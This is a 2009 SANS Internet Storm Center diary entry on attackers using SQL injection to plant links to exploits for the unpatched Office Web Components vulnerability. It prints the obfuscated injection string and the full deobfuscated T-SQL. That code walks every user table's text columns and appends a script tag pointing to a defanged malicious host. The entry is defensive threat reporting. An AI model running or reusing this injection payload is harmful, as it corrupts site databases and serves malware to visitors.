Threat Level: green Handler on Duty: Brad Duncan

SANS ISC: OWC exploits used in SQL injection attacks SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
OWC exploits used in SQL injection attacks

As we thought, it was just a matter of time before more attackers start exploiting the still unpatched Office Web Components vulnerability.

While a day ago reports of exploits for this vulnerability were still a bit rare, yesterday Ken Hoover sent a log of an SQL injection attempt to his web site. The SQL injection attempt looks very much like the one we've been seeing for month – the attacker blindly tries to inject obfuscated SQL code:

SET @S=CAST(0x44004500430…F007200 AS NVARCHAR(4000));

After deobfuscation of the CAST function input, the following SQL code is revealed:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select, from sysobjects a,syscolumns b where and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=hxxp://></script>''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

As you can see, they are injecting a script code pointing to, which is a known bad domain. This script contains links to two other web sites ( and serving malicious JavaScript that, besides exploits for some older vulnerabilities, also include the exploit for the OWC vulnerability.

The exploits end up downloading a Trojan (of course, what else) which currently has pretty bad detection (VT link) – only 15 AV programs detecting it, luckily, some major AV vendors are there.

If you haven't set those killbits yet, be sure that you do know because the number of sites exploiting this vulnerability will probably rise exponentially soon.


I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Munich February 2022


400 Posts
ISC Handler
Jul 16th 2009

Sign Up for Free or Log In to start participating in the conversation!